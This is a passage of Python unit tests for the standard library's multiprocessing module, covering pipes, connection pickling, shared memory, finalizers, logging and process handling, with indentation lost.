self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
        # Polling may "pull" a message into the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=support.LONG_TIMEOUT)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.create_server((test.support.HOST, 0))
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
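        # Receive the write end of a pipe and reply through it, then receive
        # the read end of another pipe, read a message from it and send the
        # doubled message back over the main connection.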
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
super().setUp()
# Make pristine heap for these tests
self.old_heap = multiprocessing.heap.BufferWrapper._heap
multiprocessing.heap.BufferWrapper._heap = multiprocessing.heap.Heap()
def tearDown(self):
multiprocessing.heap.BufferWrapper._heap = self.old_heap
super().tearDown()
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
heap._DISCARD_FREE_SPACE_LARGER_THAN = 0
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
del b
# verify the state of the heap
with heap._lock:
all = []
free = 0
occupied = 0
for L in list(heap._len_to_seq.values()):
# count all free blocks in arenas
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
free += (stop-start)
for arena, arena_blocks in heap._allocated_blocks.items():
# count all allocated blocks in arenas
for start, stop in arena_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
self.assertEqual(free + occupied,
sum(arena.size for arena in heap._arenas))
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
if arena != narena:
# Two different arenas
self.assertEqual(stop, heap._arenas[arena].size) # last block
self.assertEqual(nstart, 0) # first block
else:
# Same arena: two adjacent blocks
self.assertEqual(stop, nstart)
# test free'ing all blocks
random.shuffle(blocks)
while blocks:
blocks.pop()
self.assertEqual(heap._n_frees, heap._n_mallocs)
self.assertEqual(len(heap._pending_free_blocks), 0)
self.assertEqual(len(heap._arenas), 0)
self.assertEqual(len(heap._allocated_blocks), 0, heap._allocated_blocks)
self.assertEqual(len(heap._len_to_seq), 0)
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
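# Note: multiprocessing.sharedctypes.Value/Array accept either a type code
# such as 'i' or a ctypes type, including a Structure subclass like _Foo
# above; positional arguments then initialize the leading fields, e.g.
# (illustrative, mirroring the tests below):
#   foo = Value(_Foo, 3, 2)            # foo.x == 3, foo.y == 2.0
#   arr = Array('d', list(range(10)))  # shared array of 10 doubles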
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
@unittest.skipUnless(HAS_SHMEM, "requires multiprocessing.shared_memory")
class _TestSharedMemory(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@staticmethod
def _attach_existing_shmem_then_write(shmem_name_or_obj, binary_data):
if isinstance(shmem_name_or_obj, str):
local_sms = shared_memory.SharedMemory(shmem_name_or_obj)
else:
local_sms = shmem_name_or_obj
local_sms.buf[:len(binary_data)] = binary_data
local_sms.close()
def test_shared_memory_basics(self):
sms = shared_memory.SharedMemory('test01_tsmb', create=True, size=512)
self.addCleanup(sms.unlink)
# Verify attributes are readable.
self.assertEqual(sms.name, 'test01_tsmb')
self.assertGreaterEqual(sms.size, 512)
self.assertGreaterEqual(len(sms.buf), sms.size)
# Modify contents of shared memory segment through memoryview.
sms.buf[0] = 42
self.assertEqual(sms.buf[0], 42)
# Attach to existing shared memory segment.
also_sms = shared_memory.SharedMemory('test01_tsmb')
self.assertEqual(also_sms.buf[0], 42)
also_sms.close()
# Attach to existing shared memory segment but specify a new size.
same_sms = shared_memory.SharedMemory('test01_tsmb', size=20*sms.size)
self.assertLess(same_sms.size, 20*sms.size) # Size was ignored.
same_sms.close()
# Creating a shared memory segment with a negative size must fail.
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=True, size=-2)
# Attaching Shared Memory Segment without a name
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=False)
# Test if shared memory segment is created properly,
# when _make_filename returns an existing shared memory segment name
with unittest.mock.patch(
'multiprocessing.shared_memory._make_filename') as mock_make_filename:
NAME_PREFIX = shared_memory._SHM_NAME_PREFIX
names = ['test01_fn', 'test02_fn']
# Prepend NAME_PREFIX which can be '/psm_' or 'wnsm_', necessary
# because some POSIX compliant systems require name to start with /
names = [NAME_PREFIX + name for name in names]
mock_make_filename.side_effect = names
shm1 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm1.unlink)
self.assertEqual(shm1._name, names[0])
mock_make_filename.side_effect = names
shm2 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm2.unlink)
self.assertEqual(shm2._name, names[1])
if shared_memory._USE_POSIX:
# Posix Shared Memory can only be unlinked once. Here we
# test an implementation detail that is not observed across
# all supported platforms (since WindowsNamedSharedMemory
# manages unlinking on its own and unlink() does nothing).
# True release of shared memory segment does not necessarily
# happen until process exits, depending on the OS platform.
with self.assertRaises(FileNotFoundError):
sms_uno = shared_memory.SharedMemory(
'test01_dblunlink',
create=True,
size=5000
)
try:
self.assertGreaterEqual(sms_uno.size, 5000)
sms_duo = shared_memory.SharedMemory('test01_dblunlink')
sms_duo.unlink() # First shm_unlink() call.
sms_duo.close()
sms_uno.close()
finally:
sms_uno.unlink() # A second shm_unlink() call is bad.
with self.assertRaises(FileExistsError):
# Attempting to create a new shared memory segment with a
# name that is already in use triggers an exception.
there_can_only_be_one_sms = shared_memory.SharedMemory(
'test01_tsmb',
create=True,
size=512
)
if shared_memory._USE_POSIX:
# Requesting creation of a shared memory segment with the option
# to attach to an existing segment, if that name is currently in
# use, should not trigger an exception.
# Note: Using a smaller size could possibly cause truncation of
# the existing segment but is OS platform dependent. In the
# case of MacOS/darwin, requesting a smaller size is disallowed.
class OptionalAttachSharedMemory(shared_memory.SharedMemory):
_flags = os.O_CREAT | os.O_RDWR
ok_if_exists_sms = OptionalAttachSharedMemory('test01_tsmb')
self.assertEqual(ok_if_exists_sms.size, sms.size)
ok_if_exists_sms.close()
# Attempting to attach to an existing shared memory segment when
# no segment exists with the supplied name triggers an exception.
with self.assertRaises(FileNotFoundError):
nonexisting_sms = shared_memory.SharedMemory('test01_notthere')
nonexisting_sms.unlink() # Error should occur on prior line.
sms.close()
def test_shared_memory_across_processes(self):
sms = shared_memory.SharedMemory('test02_tsmap', True, size=512)
self.addCleanup(sms.unlink)
# Verify remote attachment to existing block by name is working.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms.name, b'howdy')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'howdy')
# Verify pickling of SharedMemory instance also works.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms, b'HELLO')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'HELLO')
sms.close()
@unittest.skipIf(os.name != "posix", "not feasible in non-posix platforms")
def test_shared_memory_SharedMemoryServer_ignores_sigint(self):
# bpo-36368: protect SharedMemoryManager server process from
# KeyboardInterrupt signals.
smm = multiprocessing.managers.SharedMemoryManager()
smm.start()
# make sure the manager works properly at the beginning
sl = smm.ShareableList(range(10))
# the manager's server should ignore KeyboardInterrupt signals, and
# maintain its connection with the current process, and succeed when
# asked to deliver memory segments.
os.kill(smm._process.pid, signal.SIGINT)
sl2 = smm.ShareableList(range(10))
# test that the custom signal handler registered in the Manager does
# not affect signal handling in the parent process.
with self.assertRaises(KeyboardInterrupt):
os.kill(os.getpid(), signal.SIGINT)
smm.shutdown()
@unittest.skipIf(os.name != "posix", "resource_tracker is posix only")
def test_shared_memory_SharedMemoryManager_reuses_resource_tracker(self):
# bpo-36867: test that a SharedMemoryManager uses the
# same resource_tracker process as its parent.
cmd = '''if 1:
from multiprocessing.managers import SharedMemoryManager
smm = SharedMemoryManager()
smm.start()
sl = smm.ShareableList(range(10))
smm.shutdown()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
# Before bpo-36867 was fixed, a SharedMemoryManager not using the same
# resource_tracker process as its parent would make the parent's
# tracker complain about sl being leaked even though smm.shutdown()
# properly released sl.
self.assertFalse(err)
def test_shared_memory_SharedMemoryManager_basics(self):
smm1 = multiprocessing.managers.SharedMemoryManager()
with self.assertRaises(ValueError):
smm1.SharedMemory(size=9) # Fails if SharedMemoryServer not started
smm1.start()
lol = [ smm1.ShareableList(range(i)) for i in range(5, 10) ]
lom = [ smm1.SharedMemory(size=j) for j in range(32, 128, 16) ]
doppleganger_list0 = shared_memory.ShareableList(name=lol[0].shm.name)
self.assertEqual(len(doppleganger_list0), 5)
doppleganger_shm0 = shared_memory.SharedMemory(name=lom[0].name)
self.assertGreaterEqual(len(doppleganger_shm0.buf), 32)
held_name = lom[0].name
smm1.shutdown()
if sys.platform != "win32":
# Calls to unlink() have no effect on Windows platform; shared
# memory will only be released once final process exits.
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_shm = shared_memory.SharedMemory(name=held_name)
with multiprocessing.managers.SharedMemoryManager() as smm2:
sl = smm2.ShareableList("howdy")
shm = smm2.SharedMemory(size=128)
held_name = sl.shm.name
if sys.platform != "win32":
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_sl = shared_memory.ShareableList(name=held_name)
def test_shared_memory_ShareableList_basics(self):
sl = shared_memory.ShareableList(
['howdy', b'HoWdY', -273.154, 100, None, True, 42]
)
self.addCleanup(sl.shm.unlink)
# Verify attributes are readable.
self.assertEqual(sl.format, '8s8sdqxxxxxx?xxxxxxxx?q')
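# The format above is a struct-module layout: '8s' is an 8-byte string slot,
# 'd' a double, 'q' a signed long long, '?' a bool and 'x' a pad byte added
# for alignment, so each of the two initial strings occupies a fixed 8-byte
# slot.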
# Exercise len().
self.assertEqual(len(sl), 7)
# Exercise index().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
with self.assertRaises(ValueError):
sl.index('100')
self.assertEqual(sl.index(100), 3)
# Exercise retrieving individual values.
self.assertEqual(sl[0], 'howdy')
self.assertEqual(sl[-2], True)
# Exercise iterability.
self.assertEqual(
tuple(sl),
('howdy', b'HoWdY', -273.154, 100, None, True, 42)
)
# Exercise modifying individual values.
sl[3] = 42
self.assertEqual(sl[3], 42)
sl[4] = 'some' # Change type at a given position.
self.assertEqual(sl[4], 'some')
self.assertEqual(sl.format, '8s8sdq8sxxxxxxx?q')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[4] = 'far too many'
self.assertEqual(sl[4], 'some')
sl[0] = 'encodés' # Exactly 8 bytes of UTF-8 data
self.assertEqual(sl[0], 'encodés')
self.assertEqual(sl[1], b'HoWdY') # no spillage
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[0] = 'encodées' # Exactly 9 bytes of UTF-8 data
self.assertEqual(sl[1], b'HoWdY')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[1] = b'123456789'
self.assertEqual(sl[1], b'HoWdY')
# Exercise count().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
self.assertEqual(sl.count(42), 2)
self.assertEqual(sl.count(b'HoWdY'), 1)
self.assertEqual(sl.count(b'adios'), 0)
# Exercise creating a duplicate.
sl_copy = shared_memory.ShareableList(sl, name='test03_duplicate')
try:
self.assertNotEqual(sl.shm.name, sl_copy.shm.name)
self.assertEqual('test03_duplicate', sl_copy.shm.name)
self.assertEqual(list(sl), list(sl_copy))
self.assertEqual(sl.format, sl_copy.format)
sl_copy[-1] = 77
self.assertEqual(sl_copy[-1], 77)
self.assertNotEqual(sl[-1], 77)
sl_copy.shm.close()
finally:
sl_copy.shm.unlink()
# Obtain a second handle on the same ShareableList.
sl_tethered = shared_memory.ShareableList(name=sl.shm.name)
self.assertEqual(sl.shm.name, sl_tethered.shm.name)
sl_tethered[-1] = 880
self.assertEqual(sl[-1], 880)
sl_tethered.shm.close()
sl.shm.close()
# Exercise creating an empty ShareableList.
empty_sl = shared_memory.ShareableList()
try:
self.assertEqual(len(empty_sl), 0)
self.assertEqual(empty_sl.format, '')
self.assertEqual(empty_sl.count('any'), 0)
with self.assertRaises(ValueError):
empty_sl.index(None)
empty_sl.shm.close()
finally:
empty_sl.shm.unlink()
def test_shared_memory_ShareableList_pickling(self):
sl = shared_memory.ShareableList(range(10))
self.addCleanup(sl.shm.unlink)
serialized_sl = pickle.dumps(sl)
deserialized_sl = pickle.loads(serialized_sl)
self.assertTrue(
isinstance(deserialized_sl, shared_memory.ShareableList)
)
self.assertEqual(deserialized_sl[-1], 9)
self.assertFalse(sl is deserialized_sl)
deserialized_sl[4] = "changed"
self.assertEqual(sl[4], "changed")
# Verify data is not being put into the pickled representation.
name = 'a' * len(sl.shm.name)
larger_sl = shared_memory.ShareableList(range(400))
self.addCleanup(larger_sl.shm.unlink)
serialized_larger_sl = pickle.dumps(larger_sl)
self.assertTrue(len(serialized_sl) == len(serialized_larger_sl))
larger_sl.shm.close()
deserialized_sl.shm.close()
sl.shm.close()
def test_shared_memory_cleaned_after_process_termination(self):
cmd = '''if 1:
import os, time, sys
from multiprocessing import shared_memory
# Create a shared_memory segment, and send the segment name
sm = shared_memory.SharedMemory(create=True, size=10)
sys.stdout.write(sm.name + '\\n')
sys.stdout.flush()
time.sleep(100)
'''
with subprocess.Popen([sys.executable, '-E', '-c', cmd],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as p:
name = p.stdout.readline().strip().decode()
# Abruptly killing a process that holds a reference to a shared memory
# segment should not leak that segment.
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
t = 0.1
while time.monotonic() < deadline:
time.sleep(t)
t = min(t*2, 5)
try:
smm = shared_memory.SharedMemory(name, create=False)
except FileNotFoundError:
break
else:
raise AssertionError("A SharedMemory segment was leaked after"
" a process was abruptly terminated.")
if os.name == 'posix':
# A warning was emitted by the subprocess' own
# resource_tracker (on Windows, shared memory segments
# are released automatically by the OS).
err = p.stderr.read().decode()
self.assertIn(
"resource_tracker: There appear to be 1 leaked "
"shared_memory objects to clean up at shutdown", err)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
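# Expected below: 'a' and 'b' fire when their finalizers are triggered
# directly (del / explicit call); _exit_function() then runs the remaining
# finalizers in decreasing exitpriority order, with equal priorities firing
# in reverse registration order ('d10', 'd03', 'd02', 'd01', 'e'), while 'c',
# registered without an exitpriority, is never run at exit.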
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with test.support.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(folder, '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
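# Both SyncManager.start() and Pool() accept an initializer callable and its
# argument tuple: it runs once in the manager's server process for start(),
# and once per worker for Pool(), which is why the single-worker Pool below
# increments ns.test exactly once.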
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
